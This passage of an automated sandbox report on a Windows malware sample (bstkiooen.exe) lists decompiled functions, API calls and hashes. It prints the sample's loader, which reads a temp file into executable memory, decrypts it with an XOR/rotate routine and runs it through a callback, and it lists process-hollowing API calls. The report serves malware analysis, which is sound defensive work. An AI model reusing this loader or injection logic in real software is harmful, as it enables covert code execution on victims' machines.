Opcode Fuzzy Hash: 20944edbe86703f9d2c7c8edc5db9af38acbac081ac9a8507c4204983803540e
Instruction Fuzzy Hash: A601F16350031279DA30BB768CC6D6BA7ACEF91770B40481AF558D6082EB20DD80E3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C61316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C61316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00C6E2C1(0xca1030, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00C6E2E8(0xca1030, __edx, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xcc3154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xc935f4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00c6131d
0x00c61380
0x00c6131f
0x00c6131f
0x00c61326
0x00c6133c
0x00c61345
0x00c6134a
0x00c61352
0x00c6135a
0x00c61362
0x00c61370
0x00c61370
0x00c61362
0x00c61352
0x00c61345
0x00c61326
0x00c61388

APIs

Part of subcall function 00C6E2E8: _swprintf.LIBCMT ref: 00C6E30E
Part of subcall function 00C6E2E8: _strlen.LIBCMT ref: 00C6E32F
Part of subcall function 00C6E2E8: SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
Part of subcall function 00C6E2E8: GetWindowRect.USER32(?,?), ref: 00C6E3C9
Part of subcall function 00C6E2E8: GetClientRect.USER32(?,?), ref: 00C6E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

Strings

0, xrefs: 00C61319

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
Instruction ID: c3e82e79657528ee2b3b107e39cffe2f158cd9ffd8846af94a44b599f6a2352f
Opcode Fuzzy Hash: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
Instruction Fuzzy Hash: 65F0AF701042C8AADF650F61DC8DBEE3B69AF04346F0C8124FC57506B1CB74CA90EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C70FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00C70FE4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00C66C31(E00C66C36(_t6, 0xca1098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xca1098, 0xca1098, 2);
				}
				return _t2;
			}

0x00c70fe4
0x00c70fea
0x00c70ff3
0x00c70ffc
0x00000000
0x00c7101b
0x00c7101c

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00C71101,?,?,00C7117F,?,?,?,?,?,00C71169), ref: 00C70FEA
GetLastError.KERNEL32(?,?,00C7117F,?,?,?,?,?,00C71169), ref: 00C70FF6

Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00C70FFF

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 4c77e7fa9296162d8e02e6983a2aace496cf939df556752415868f2c2a03d481
Instruction ID: fdd0049a96ae75760453c26b609a012cb7ac1d561cf8a56ec66a6e661abfdbfe
Opcode Fuzzy Hash: 4c77e7fa9296162d8e02e6983a2aace496cf939df556752415868f2c2a03d481
Instruction Fuzzy Hash: 98D05E725089717ACA203338AC4EE6F3904AB22731F644715F639662F6CB254E92A692

Uniqueness

Uniqueness Score: -1.00%

Function 00C6E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6E29E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x00c6e2a1
0x00c6e2b1
0x00c6e2b9
0x00c6e2bb
0x00000000
0x00c6e2bb
0x00c6e2c0

APIs

GetModuleHandleW.KERNEL32(00000000,?,00C6DA55,?), ref: 00C6E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C6DA55,?), ref: 00C6E2B1

Strings

RTL, xrefs: 00C6E2AB

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
Instruction ID: fdbfb821d26cffbb0216146d07ec13939bb19d28724e1a8a5a42dbc5cac6e405
Opcode Fuzzy Hash: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
Instruction Fuzzy Hash: 8EC08C3124079066EB3027B47C4EF8B6F585B01B15F09149EBA81EA2E1DFE6CA80C7E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bstkiooen.exePID: 6112, Parent PID: 5604COMMON

Execution Graph

Execution Coverage:	70.7%
Dynamic/Decrypted Code Coverage:	89.2%
Signature Coverage:	16.7%
Total number of Nodes:	120
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00BD043D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 292
threadfilenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00BD0611
NtSetInformationFile.NTDLL(00000000,?,00000001,00000001,0000000D,?), ref: 00BD0637
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00BD064D
CreateProcessInternalW.KERNELBASE(00000000,00000000,00000000), ref: 00BD06B2
GetThreadContext.KERNELBASE(00000000,00010002,000000FF,000000FF,?), ref: 00BD0727
SetThreadContext.KERNELBASE(00000000,00010002), ref: 00BD073D
GetThreadContext.KERNELBASE(00000000,?,?,00000000,000002CC), ref: 00BD076B

Strings

D, xrefs: 00BD0688

Memory Dump Source

Source File: 00000001.00000002.380548581.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bd0000_bstkiooen.jbxd

Similarity

API ID: ContextFileThread$CreateInformationInternalNameProcessTempWrite
String ID: D
API String ID: 2732076800-2746444292
Opcode ID: b8a9936f7ac97d96acfb98e2c1d6f6aa4fffcbd71299758c609f111182ee526d
Instruction ID: dd6d127fc027cd1e26c8bd124805bf917aa1e67cf7acc306d908f36125dcd636
Opcode Fuzzy Hash: b8a9936f7ac97d96acfb98e2c1d6f6aa4fffcbd71299758c609f111182ee526d
Instruction Fuzzy Hash: A6A15B71910209AAEF21ABA4CC45FEEFBF8EF15314F1041A7F604FA291E7749E448B65

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0227 Relevance: 4.7, APIs: 3, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00BD0350
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00BD036F
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00BD037E

Memory Dump Source

Source File: 00000001.00000002.380548581.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bd0000_bstkiooen.jbxd

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 5d268337d6eca2868cb036be5aff4116f3da6edd933ca6b536ac50a35b97d509
Instruction ID: 6eb784000e8d8ce9785826bd1b85a6b949d80f06ee994c04ae57fc6508121056
Opcode Fuzzy Hash: 5d268337d6eca2868cb036be5aff4116f3da6edd933ca6b536ac50a35b97d509
Instruction Fuzzy Hash: C151D2219502287BEF10AAB18C76FEFA7F8DF06750F206157F640F72C1E6784A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BD07DF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenFile.NTDLL(?,C0110000,?,?,00000003,00000020), ref: 00BD0926

Strings

@, xrefs: 00BD08F5

Memory Dump Source

Source File: 00000001.00000002.380548581.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bd0000_bstkiooen.jbxd

Similarity

API ID: FileOpen
String ID: @
API String ID: 2669468079-2766056989
Opcode ID: f4319a63b9ff219224754e13554224548ab95d3bf6fcec6f29ae1807570ba8b7
Instruction ID: bec931e8c63e3b7e9442f4ee80669c9156f4d2d2b6effc0c49650696df5c7dbf
Opcode Fuzzy Hash: f4319a63b9ff219224754e13554224548ab95d3bf6fcec6f29ae1807570ba8b7
Instruction Fuzzy Hash: 4E417B31D1020CAADF10EBF4C945AEEB7B8EF58310F10416BE504FB290F6715A49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 001D1000 Relevance: 12.2, APIs: 8, Instructions: 197
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_() {
				signed int _v5;
				signed int _v12;
				void* _v16;
				void* _v20;
				long _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				short _v572;
				long _t116;
				void* _t118;
				void* _t119;
				void* _t122;
				int _t124;
				int _t125;

				_v48 =  *0x1d3000;
				_v44 =  *0x1d3004;
				_v40 =  *0x1d3008;
				_v36 =  *0x1d300c;
				_v32 =  *0x1d3010;
				_v12 = 0;
				_v28 = GetProcAddress(GetModuleHandleW(0x1d3020), 0x1d3014);
				_t116 = GetTempPathW(0x103,  &_v572);
				if(_t116 != 0) {
					_t118 = _v28( &_v572,  &_v48);
					if(_t118 != 0) {
						_t119 = CreateFileW( &_v572, 0x80000000, 1, 0, 3, 0x80, 0); // executed
						_v20 = _t119;
						if(_v20 != 0xffffffff) {
							_v24 = GetFileSize(_v20, 0);
							_t122 = VirtualAlloc(0, _v24, 0x3000, 0x40); // executed
							_v16 = _t122;
							_t124 = ReadFile(_v20, _v16, _v24,  &_v52, 0); // executed
							if(_t124 != 0) {
								_v12 = 0;
								while(_v12 < _v24) {
									_v5 =  *((intOrPtr*)(_v16 + _v12));
									_v5 = _v5 & 0x000000ff ^ 0x000000bd;
									_v5 =  !(_v5 & 0x000000ff);
									_v5 = (_v5 & 0x000000ff) - 0x9d;
									_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - 0x8e;
									_v5 =  !(_v5 & 0x000000ff);
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 =  ~(_v5 & 0x000000ff);
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
									_v5 = (_v5 & 0x000000ff) + 0x3c;
									_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
									_v5 = (_v5 & 0x000000ff) - _v12;
									_v5 = _v5 & 0x000000ff ^ _v12;
									_v5 = (_v5 & 0x000000ff) - 0xb4;
									 *((char*)(_v16 + _v12)) = _v5;
									_v12 = _v12 + 1;
								}
								_t125 = EnumResourceTypesA(0, _v16, 0); // executed
								return _t125;
							}
							return _t124;
						}
						return _t119;
					}
					return _t118;
				}
				return _t116;
			}

0x001d100e
0x001d1017
0x001d1020
0x001d1028
0x001d1031
0x001d1034
0x001d1052
0x001d1061
0x001d1069
0x001d107b
0x001d1080
0x001d10a0
0x001d10a6
0x001d10ad
0x001d10c0
0x001d10d0
0x001d10d6
0x001d10eb
0x001d10f3
0x001d10fa
0x001d110c
0x001d1120
0x001d112d
0x001d1136
0x001d1142
0x001d1154
0x001d115e
0x001d1168
0x001d1171
0x001d117b
0x001d1188
0x001d1191
0x001d119b
0x001d11a5
0x001d11ae
0x001d11b8
0x001d11cb
0x001d11d5
0x001d11de
0x001d11e8
0x001d11f2
0x001d1205
0x001d120f
0x001d1222
0x001d122c
0x001d1236
0x001d1240
0x001d1253
0x001d125d
0x001d1267
0x001d1274
0x001d1280
0x001d1109
0x001d1109
0x001d128f
0x00000000
0x001d128f
0x00000000
0x001d10f3
0x00000000
0x001d10ad
0x00000000
0x001d1080
0x00000000

APIs

GetModuleHandleW.KERNEL32(001D3020,001D3014), ref: 001D1045
GetProcAddress.KERNEL32(00000000), ref: 001D104C
GetTempPathW.KERNEL32(00000103,?), ref: 001D1061

Memory Dump Source

Source File: 00000001.00000002.380431762.00000000001D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.380408523.00000000001D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.380449469.00000000001D2000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.380479866.00000000001D4000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1d0000_bstkiooen.jbxd

Similarity

API ID: AddressHandleModulePathProcTemp
String ID:
API String ID: 775647363-0
Opcode ID: 7504f6a430cdb4aed45c684a6eac368ef9034fe0a6a8fc5417f925040256b6a0
Instruction ID: 2e980c9f8ccd5fbda97ec5e0156afcaa376a61b5b5e6c705981bb2a488f9a795
Opcode Fuzzy Hash: 7504f6a430cdb4aed45c684a6eac368ef9034fe0a6a8fc5417f925040256b6a0
Instruction Fuzzy Hash: DA912E74D4D3D8BECB05CBF984547EDBFB19F5A201F0881CAE1A1A6382C635538ADB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0FD0 Relevance: 10.7, APIs: 7, Instructions: 192
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,00000000,7F91A078,00000000,7F951704,00000000,7FE1F1FB,00000000,7FE7F840,00000000), ref: 00BD1099
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000,000F001F), ref: 00BD10C3
ReadFile.KERNELBASE(00000000,00000000,00000000,7FAB7E30,00000000,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000), ref: 00BD10DA
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000,000F001F), ref: 00BD10FE
FindCloseChangeNotification.KERNELBASE(00000000,00BD066A,00000000,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000,000F001F,00000000), ref: 00BD116E
VirtualFree.KERNELBASE(00000000,00000000,00008000,00BD066A,00000000,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000), ref: 00BD1179
VirtualFree.KERNELBASE(00BD066A,00000000,00008000,?,?,?,?,00BD11E8,7FAB7E30,00BD0AB7,00000000,00000002,00000000,00000000,000F001F,00000000), ref: 00BD11C0

Memory Dump Source

Source File: 00000001.00000002.380548581.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bd0000_bstkiooen.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 6180637df355f0699c6ce2fb8729b0c60f1931ab7d05c0cb0fb63667e1e17806
Instruction ID: 80f89986afba9f1d93e292580ae3aa699606a5817dd5574d27d69b9821b19b72
Opcode Fuzzy Hash: 6180637df355f0699c6ce2fb8729b0c60f1931ab7d05c0cb0fb63667e1e17806
Instruction Fuzzy Hash: 14515F71E10218BBDB209BA88C85BAEFBB9EF58714F144596FA11F7380E77499018B64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bstkiooen.exePID: 3092, Parent PID: 6112COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.2%
Total number of Nodes:	563
Total number of Limit Nodes:	71

Executed Functions

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0041A40A(void* __edx, void* __edi, intOrPtr _a5, char _a9, intOrPtr _a13, intOrPtr _a17, intOrPtr _a21, intOrPtr _a25, intOrPtr _a29, char _a33, intOrPtr _a37, char _a41) {
				void* _t20;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				asm("loop 0xb");
				 *((intOrPtr*)(__edx - 0x23)) =  *((intOrPtr*)(__edx - 0x23)) + __edi;
				_t15 = _a5;
				_t32 = _a5 + 0xc48;
				E0041AF60(__edi, _a5, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a41; // 0x414a31
				_t8 =  &_a33; // 0x414d72
				_t14 =  &_a9; // 0x414d72
				_t20 =  *((intOrPtr*)( *_t32))( *_t14, _a13, _a17, _a21, _a25, _a29,  *_t8, _a37,  *_t6, _t31, _t34); // executed
				return _t20;
			}

0x0041a40b
0x0041a40d
0x0041a413
0x0041a41f
0x0041a427
0x0041a42c
0x0041a432
0x0041a44d
0x0041a455
0x0041a459

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: 550db2b25968a94ebe1f419426a792a06487a3754455a418d0eac639dce7ec60
Instruction ID: 238c7103e9aefafeeab19cfbdc05c9af3277ede587a6f5b95aa68f8d9401be1f
Opcode Fuzzy Hash: 550db2b25968a94ebe1f419426a792a06487a3754455a418d0eac639dce7ec60
Instruction Fuzzy Hash: 86F017B2200108AFCB04CF89CC85EEBB3ADEF8C314F158259BA0D97240C630E851CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x0041a413
0x0041a41f
0x0041a427
0x0041a42c
0x0041a432
0x0041a44d
0x0041a455
0x0041a459

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A44D, 0041A454

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53A Relevance: 1.6, APIs: 1, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0041A53A(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
				signed char _t16;

				_t16 = __eax ^ 0x000000c3;
				asm("into");
				asm("hlt");
				asm("popad");
				if (_t16 >= 0) goto L3;
			}

0x0041a53a
0x0041a53c
0x0041a53d
0x0041a53e
0x0041a53f

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6376e2ddaa9423180bbfd253ba80e2ec110acdb5a385426a724eab7fd331740a
Instruction ID: 3ef70daf0845a866249cdf9e141d263a770ae758b82170b29f82ba457cf97a9d
Opcode Fuzzy Hash: 6376e2ddaa9423180bbfd253ba80e2ec110acdb5a385426a724eab7fd331740a
Instruction Fuzzy Hash: 9301E5B6200209ABCB14DF99DC81DEB73ADEF88754F148509B90997241C634E861CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3B2 Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.367266118.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367408403.000000000041F000.00000040.00000001.01000000.00000000.sdmpDownload File
Associated: 00000002.00000002.367420200.0000000000420000.00000020.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bstkiooen.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f4bd7b5f19bf4e70bd99e4bbfb217768a74a41c3b58d2cc9dc341e5851dda04
Instruction ID: 65308f09f696734e8543bb2327df8f9c0b469b72604f0f37a8f3c570f279b25e
Opcode Fuzzy Hash: 1f4bd7b5f19bf4e70bd99e4bbfb217768a74a41c3b58d2cc9dc341e5851dda04
Instruction Fuzzy Hash: FA01E8B2205208ABDB04DF88DC81DDB37E9EF8C714F158108FA1C97241D630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("out 0xb7, al");
				asm("sbb edx, ebp");
				asm("movsb");
				_t17 = _a4;
